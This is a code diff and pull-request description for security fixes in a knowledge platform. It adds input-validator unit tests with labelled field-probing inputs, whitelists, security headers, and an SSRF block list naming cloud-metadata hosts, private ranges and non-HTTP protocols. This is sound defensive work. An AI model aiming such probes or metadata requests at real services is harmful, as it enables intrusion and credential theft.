+        Map<String, String> sortBy = new HashMap<>();
+        sortBy.put("nonExistentField", "asc");
+        SearchInputValidator.validateSortBy(sortBy);
+    }
+
+    @Test(expected = ClientException.class)
+    public void testInvalidSortDirection() {
+        Map<String, String> sortBy = new HashMap<>();
+        sortBy.put("name", "INVALID");
+        SearchInputValidator.validateSortBy(sortBy);
+    }
+
+    // === validateExistsFields tests (INJ-VULN-06) ===
+
+    @Test
+    public void testValidExistsFields() {
+        List<String> fields = Arrays.asList("name", "description", "artifactUrl");
+        SearchInputValidator.validateExistsFields(fields); // should not throw
+    }
+
+    @Test
+    public void testNullExistsFields() {
+        SearchInputValidator.validateExistsFields(null); // should not throw
+    }
+
+    @Test(expected = ClientException.class)
+    public void testInvalidExistsField() {
+        // INJ-VULN-06: attacker probes field existence as binary oracle
+        List<String> fields = Arrays.asList("name", "_secret_internal_field");
+        SearchInputValidator.validateExistsFields(fields);
+    }
+
+    @Test(expected = ClientException.class)
+    public void testExistsFieldsTooMany() {
+        List<String> fields = Arrays.asList(
+                "name", "description", "status", "mimeType", "primaryCategory",
+                "objectType", "contentType", "channel", "framework", "board", "medium"
+        );
+        SearchInputValidator.validateExistsFields(fields); // 11 > max 10
+    }
+
+    // === validateSoftConstraints tests (INJ-VULN-08) ===
+
+    @Test
+    public void testValidSoftConstraints() {
+        Map<String, Object> sc = new HashMap<>();
+        sc.put("board", 100);
+        sc.put("gradeLevel", 50);
+        SearchInputValidator.validateSoftConstraints(sc); // should not throw
+    }
+
+    @Test
+    public void testNullSoftConstraints() {
+        SearchInputValidator.validateSoftConstraints(null); // should not throw
+    }
+
+    @Test(expected = ClientException.class)
+    public void testSoftConstraintWithDotNotation() {
+        // INJ-VULN-08: attacker uses dot notation for nested field probing
+        Map<String, Object> sc = new HashMap<>();
+        sc.put("nested.field.probe", 100);
+        SearchInputValidator.validateSoftConstraints(sc);
+    }
+
+    @Test(expected = ClientException.class)
+    public void testSoftConstraintWithBracketNotation() {
+        Map<String, Object> sc = new HashMap<>();
+        sc.put("field[0]", 100);
+        SearchInputValidator.validateSoftConstraints(sc);
+    }
+}

--- a/search-api/search-service/conf/application.conf
+++ b/search-api/search-service/conf/application.conf
@@ -295,6 +295,15 @@ search.fields.mode_collection=["identifier","name","objectType","contentType","m
 search.batch.size=500
 search.connection.timeout=30
 
+# Whitelists for SearchInputValidator (INJ-VULN-01..08). Override defaults; if absent, hardcoded defaults used.
+search.allowed.facet.fields=["objectType","contentType","status","mimeType","primaryCategory","channel","framework","board","medium","gradeLevel","subject","resourceType","audience","license","language","domain","targetFWIds","se_boards","se_mediums","se_gradeLevels","se_subjects","visibility","compatibilityLevel","mediaType","origin","createdBy"]
+search.allowed.sort.fields=["name","lastUpdatedOn","createdOn","pkgVersion","identifier","objectType","contentType","status","mimeType","primaryCategory","lastPublishedOn","lastSubmittedOn","rating","me_averageRating"]
+search.allowed.exists.fields=["name","description","status","mimeType","primaryCategory","objectType","contentType","channel","framework","board","medium","gradeLevel","subject","artifactUrl","downloadUrl","variants","pkgVersion","audience","license","language","lastPublishedOn","identifier","createdOn","lastUpdatedOn","resourceType","appIcon","posterImage","visibility","compatibilityLevel","mediaType","origin","rating"]
+# Max counts — guard against payload bloat / DoS
+search.max.facets=20
+search.max.sort.fields=5
+search.max.exists.fields=10
+
 platform-api-url="http://localhost:8080/learning-service"
 language.map={"Hindi":"hi", "English":"en", "Telugu":"te", "Kannada":"ka", "Tamil":"ta", "Assamese":"as", "Bengali":"bn", "Bodo":"bo", "Gujarati":"gu", "Konkani":"ko", "Malayalam":"ml", "Marathi":"mr", "Nepali":"ne", "Odia":"or", "Punjabi":"pj", "Sanskrit":"sk"}
 #Top N Config for Search Telemetry

--- a/search-api/search-service/conf/application.conf
+++ b/search-api/search-service/conf/application.conf
@@ -322,3 +322,6 @@ cloud_storage_container=""
 # Redis Configuration
 # Redis is not currently used by search-api. cache.type="redis" above is a legacy dead key.
 redis.enable = false
+
+# HTML Sanitizer Settings
+html.sanitizer.max.depth=25

--- a/search-api/search-service/conf/application.conf
+++ b/search-api/search-service/conf/application.conf
@@ -250,10 +250,15 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
+    # Values: "DENY" (block all framing), "SAMEORIGIN" (allow same-origin framing), null (disable header)
     frameOptions = "DENY"
+    # Values: "1; mode=block" (enable legacy XSS auditor), null (disable — recommended, auditor is exploitable)
     xssProtection = null
+    # Values: "nosniff" (prevent MIME-type sniffing), null (disable header)
     contentTypeOptions = "nosniff"
+    # Values: "none", "master-only", "by-content-type", "all", null (disable — not needed for JSON APIs)
     permittedCrossDomainPolicies = null
+    # Values: CSP directive string e.g. "default-src 'self'", null (disable — not meaningful for JSON APIs)
     contentSecurityPolicy = null
   }
 

--- a/search-api/search-service/conf/application.conf
+++ b/search-api/search-service/conf/application.conf
@@ -220,7 +220,7 @@ play.filters {
 
   # Enabled filters are run automatically against Play.
   # CSRFFilter, AllowedHostFilters, and SecurityHeadersFilters are enabled by default.
-  enabled = [filters.AccessLogFilter]
+  enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
 
   # Disabled filters remove elements from the enabled list.
   # disabled += filters.CSRFFilter
@@ -250,20 +250,11 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
-    # The X-Frame-Options header. If null, the header is not set.
-    #frameOptions = "DENY"
-
-    # The X-XSS-Protection header. If null, the header is not set.
-    #xssProtection = "1; mode=block"
-
-    # The X-Content-Type-Options header. If null, the header is not set.
-    #contentTypeOptions = "nosniff"
-
-    # The X-Permitted-Cross-Domain-Policies header. If null, the header is not set.
-    #permittedCrossDomainPolicies = "master-only"
-
-    # The Content-Security-Policy header. If null, the header is not set.
-    #contentSecurityPolicy = "default-src 'self'"
+    frameOptions = "DENY"
+    xssProtection = null
+    contentTypeOptions = "nosniff"
+    permittedCrossDomainPolicies = null
+    contentSecurityPolicy = null
   }
 
   ## Allowed hosts filter configuration

--- a/taxonomy-api/taxonomy-service/conf/application.conf
+++ b/taxonomy-api/taxonomy-service/conf/application.conf
@@ -338,3 +338,5 @@ framework.cache.read = false
 
 lock.keyspace = "lock_db"
 defaultLockExpiryTime = 3600
+# HTML Sanitizer Settings
+html.sanitizer.max.depth=25

--- a/taxonomy-api/taxonomy-service/conf/application.conf
+++ b/taxonomy-api/taxonomy-service/conf/application.conf
@@ -250,10 +250,15 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
+    # Values: "DENY" (block all framing), "SAMEORIGIN" (allow same-origin framing), null (disable header)
     frameOptions = "DENY"
+    # Values: "1; mode=block" (enable legacy XSS auditor), null (disable — recommended, auditor is exploitable)
     xssProtection = null
+    # Values: "nosniff" (prevent MIME-type sniffing), null (disable header)
     contentTypeOptions = "nosniff"
+    # Values: "none", "master-only", "by-content-type", "all", null (disable — not needed for JSON APIs)
     permittedCrossDomainPolicies = null
+    # Values: CSP directive string e.g. "default-src 'self'", null (disable — not meaningful for JSON APIs)
     contentSecurityPolicy = null
   }
 

--- a/taxonomy-api/taxonomy-service/conf/application.conf
+++ b/taxonomy-api/taxonomy-service/conf/application.conf
@@ -220,7 +220,7 @@ play.filters {
 
   # Enabled filters are run automatically against Play.
   # CSRFFilter, AllowedHostFilters, and SecurityHeadersFilters are enabled by default.
-  enabled = [filters.AccessLogFilter]
+  enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
 
   # Disabled filters remove elements from the enabled list.
   # disabled += filters.CSRFFilter
@@ -250,20 +250,11 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
-    # The X-Frame-Options header. If null, the header is not set.
-    #frameOptions = "DENY"
-
-    # The X-XSS-Protection header. If null, the header is not set.
-    #xssProtection = "1; mode=block"
-
-    # The X-Content-Type-Options header. If null, the header is not set.
-    #contentTypeOptions = "nosniff"
-
-    # The X-Permitted-Cross-Domain-Policies header. If null, the header is not set.
-    #permittedCrossDomainPolicies = "master-only"
-
-    # The Content-Security-Policy header. If null, the header is not set.
-    #contentSecurityPolicy = "default-src 'self'"
+    frameOptions = "DENY"
+    xssProtection = null
+    contentTypeOptions = "nosniff"
+    permittedCrossDomainPolicies = null
+    contentSecurityPolicy = null
   }
 
   ## Allowed hosts filter configuration

--- a/taxonomy-service-sbt/conf/application.conf
+++ b/taxonomy-service-sbt/conf/application.conf
@@ -325,3 +325,6 @@ cloudstorage.read_base_path="https://sunbirddev.blob.core.windows.net"
 cloudstorage.write_base_path=["https://sunbirddev.blob.core.windows.net"]
 cloudstorage.metadata.list=["appIcon","posterImage","artifactUrl","downloadUrl","variants","previewUrl","pdfUrl", "streamingUrl", "toc_url"]
 cloud_storage_container="sunbird-content-dev"
+
+# HTML Sanitizer Settings
+html.sanitizer.max.depth=25

--- a/taxonomy-service-sbt/conf/application.conf
+++ b/taxonomy-service-sbt/conf/application.conf
@@ -233,7 +233,7 @@ play.filters {
 
   # Enabled filters are run automatically against Play.
   # CSRFFilter, AllowedHostFilters, and SecurityHeadersFilters are enabled by default.
-  enabled = [filters.AccessLogFilter]
+  enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
 
   # Disabled filters remove elements from the enabled list.
   # disabled += filters.CSRFFilter
@@ -263,20 +263,11 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
-    # The X-Frame-Options header. If null, the header is not set.
-    #frameOptions = "DENY"
-
-    # The X-XSS-Protection header. If null, the header is not set.
-    #xssProtection = "1; mode=block"
-
-    # The X-Content-Type-Options header. If null, the header is not set.
-    #contentTypeOptions = "nosniff"
-
-    # The X-Permitted-Cross-Domain-Policies header. If null, the header is not set.
-    #permittedCrossDomainPolicies = "master-only"
-
-    # The Content-Security-Policy header. If null, the header is not set.
-    #contentSecurityPolicy = "default-src 'self'"
+    frameOptions = "DENY"
+    xssProtection = null
+    contentTypeOptions = "nosniff"
+    permittedCrossDomainPolicies = null
+    contentSecurityPolicy = null
   }
 
   ## Allowed hosts filter configuration


### PR DESCRIPTION
## Summary

This PR remediates **22+ security vulnerabilities** identified across the Knowledge Platform, grouped into 4 categories:

| Category | Vuln IDs | Count | What was vulnerable |
|----------|----------|-------|---------------------|
| **Stored XSS** | XSS-VULN-01 to 06 | 6 | User-supplied HTML stored unsanitized in graph DB, rendered back without escaping (content metadata, review comments, assessment answer templates) |
| **Elasticsearch Injection** | INJ-VULN-01 to 08 | 8 | Unvalidated user input in search facets, sort fields, exists/not_exists filters, and regex contains/endsWith queries allowed arbitrary ES query manipulation |
| **Zip Slip** | INJ-VULN-09 | 1 | Zip extraction did not validate entry paths — crafted archives could write files outside target directory |
| **SSRF** | SSRF-VULN-01 to 07 | 7 | User-supplied URLs fetched server-side without validation — allowed access to internal networks, cloud metadata (169.254.169.254), and non-HTTP protocols |

Additionally, **database authentication** support is added for all 5 database systems (Cassandra, Redis, Elasticsearch, JanusGraph, Kafka) to enforce authenticated access in production.

**113+ new unit tests** cover all attack vectors.

---

## New Methods & Classes

### `HtmlSanitizer` (platform-common)
| Method | Description |
|--------|-------------|
| `sanitizeStrict(String input)` | Strips ALL HTML tags and attributes — used for plain-text fields like `name`, `description`, `reviewComment` |
| `sanitizeRichText(String input)` | Allows safe formatting tags (`b`, `i`, `u`, `ol`, `ul`, `li`, `p`, `br`, `span`) with whitelisted attributes — used for rich-text fields like `body`, `instructions` |
| `escapeHtml(String input)` | HTML-encodes special chars (`<`, `>`, `&`, `"`) without stripping — used when content must preserve literal angle brackets |
| `sanitizeField(String fieldName, String value)` | Routes to strict or rich-text sanitizer based on field name; skips timestamp fields (`lastStatusChangedOn`, `lastUpdatedOn`, etc.) |
| `sanitizeJsonString(String fieldName, String value, int depth)` | Detects JSON-encoded strings, parses them, sanitizes inner values recursively, re-serializes |
| `sanitizeMap(Map<String, Object> data)` | Entry point — recursively walks a request map, sanitizes all string values, with max depth guard (default 25) to prevent stack overflow |
| `sanitizeList(String parentKey, List<Object> list, int depth)` | Recursively sanitizes all string elements within nested lists |
| `ensureMutableList(List<Object> list)` | Converts immutable lists (e.g., `List.of()`, `Arrays.asList()`) to mutable `ArrayList` so sanitized values can be written back |

### `SafeUrlValidator` (platform-common)
| Method | Description |
|--------|-------------|
| `validate(String urlString)` | Full validation pipeline — checks protocol, resolves DNS, validates IP ranges, checks hostname blocklist; throws `ClientException` on failure |
| `validateProtocol(URL url)` | Rejects non-HTTP/HTTPS protocols (`file://`, `ftp://`, `gopher://`, etc.) |
| `validateHost(URL url)` | Blocks known dangerous hostnames (`metadata.google.internal`, `169.254.169.254`) |
| `validateIpAddress(URL url)` | Resolves hostname via DNS, checks all resolved IPs against blocked ranges: loopback (`127.0.0.0/8`), private (`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`), link-local (`169.254.0.0/16`), IPv6 equivalents |

### `SearchInputValidator` (search-api)
| Method | Description |
|--------|-------------|
| `escapeRegexValue(String input)` | Escapes regex metacharacters (`. ? + * \| { } [ ] ( ) \ ^ $`) in user input before building ES regex queries |
| `validateFacets(List<String> facets)` | Validates facet fields against configurable whitelist; rejects unknown fields and enforces max count |
| `validateSortBy(Map<String, String> sortBy)` | Validates sort fields against whitelist; restricts direction to `asc`/`desc` only |
| `validateExistsFields(List<String> fields)` | Validates `exists`/`not_exists` filter fields against whitelist |
| `validateSoftConstraints(Map<String, Object> softConstraints)` | Validates soft constraint keys against exists-fields whitelist |

### Modified Methods
| Method | Change |
|--------|--------|
| `BaseMimeTypeManager.isInternalUrl()` | Rewritten to use `java.net.URL` parsing instead of string `contains()` — prevents bypass via crafted hostnames |
| `BaseMimeTypeManager.extractPackage()` | Added zip entry path normalization + parent directory check to block Zip Slip |
| `KafkaClient.createProducer()` | Extracted producer creation; calls `applySaslConfig()` for SASL auth |
| `KafkaClient.applySaslConfig()` | New — configures Kafka SASL authentication (mechanism, protocol, JAAS config or username/password) |
| `RedisConnector` | Added `AUTH` command on connection when `redis.password` is configured |
| `ElasticSearchUtil` (Java) | Added `CredentialsProvider` with basic auth when `search.es_username`/`search.es_password` configured |
| `CassandraConnector` | Added `withCredentials()` when `cassandra.auth.username`/`cassandra.auth.password` configured |
---

## Security Headers & Filters (application.conf)

Previously, all 6 services only had `filters.AccessLogFilter` enabled — Play's built-in `SecurityHeadersFilter` was commented out, leaving API responses with **no security headers at all**.

### What changed
```hocon
# Before
enabled = [filters.AccessLogFilter]

# After
enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
```

### Headers now set on every response

| Header | Value | Why |
|--------|-------|-----|
| `X-Frame-Options` | `DENY` | Prevents clickjacking — blocks embedding API responses in `<iframe>`. Without this, an attacker could overlay a transparent iframe on a malicious page and trick users into clicking API endpoints that perform state-changing actions. |
| `X-Content-Type-Options` | `nosniff` | Prevents MIME-type sniffing — forces browser to respect `Content-Type` header. Without this, a browser could interpret a JSON response containing `<script>` tags as HTML and execute it (content sniffing XSS). |
| `X-XSS-Protection` | `null` (disabled) | Intentionally disabled. The legacy XSS Auditor in older browsers is itself exploitable (can be used to selectively block legitimate scripts). Modern mitigation is server-side sanitization (which `HtmlSanitizer` now provides). |
| `X-Permitted-Cross-Domain-Policies` | `null` (disabled) | Not needed — this header controls Flash/PDF cross-domain policy files. Platform does not serve Flash or embedded PDF content. |
| `Content-Security-Policy` | `null` (disabled) | Not set because these are JSON API endpoints, not HTML pages. CSP is only meaningful for responses rendered as HTML by browsers. Setting CSP on JSON APIs adds overhead with zero benefit. |
---

## New Config Variables

| System | Config Key | Default |
|--------|-----------|---------|
| JanusGraph | `graph.storage.username` / `graph.storage.password` | *(empty — no auth)* |
| Cassandra | `cassandra.auth.username` / `cassandra.auth.password` | *(empty — no auth)* |
| Redis | `redis.password` | *(empty — no auth)* |
| Elasticsearch | `search.es_username` / `search.es_password` | *(empty — no auth)* |
| Kafka | `kafka.sasl.enabled` | `false` |
| Kafka | `kafka.sasl.mechanism` | `PLAIN` |
| Kafka | `kafka.security.protocol` | `SASL_PLAINTEXT` |
| Kafka | `kafka.sasl.jaas.config` OR `kafka.sasl.username` + `kafka.sasl.password` | *(empty)* |

## Test Plan
- [x] HtmlSanitizer unit tests — all XSS attack vectors (33 tests)
- [x] AssessmentV5Manager tests — HTML injection in answer templates (16 tests)
- [x] SearchInputValidator tests — ES injection payloads (27 tests)
- [x] BaseMimeTypeManager tests — Zip Slip traversal paths (6 tests)
- [x] SafeUrlValidator tests — blocked protocols, IP ranges, cloud metadata (31 tests)
- [ ] Integration test against running services with security test payloads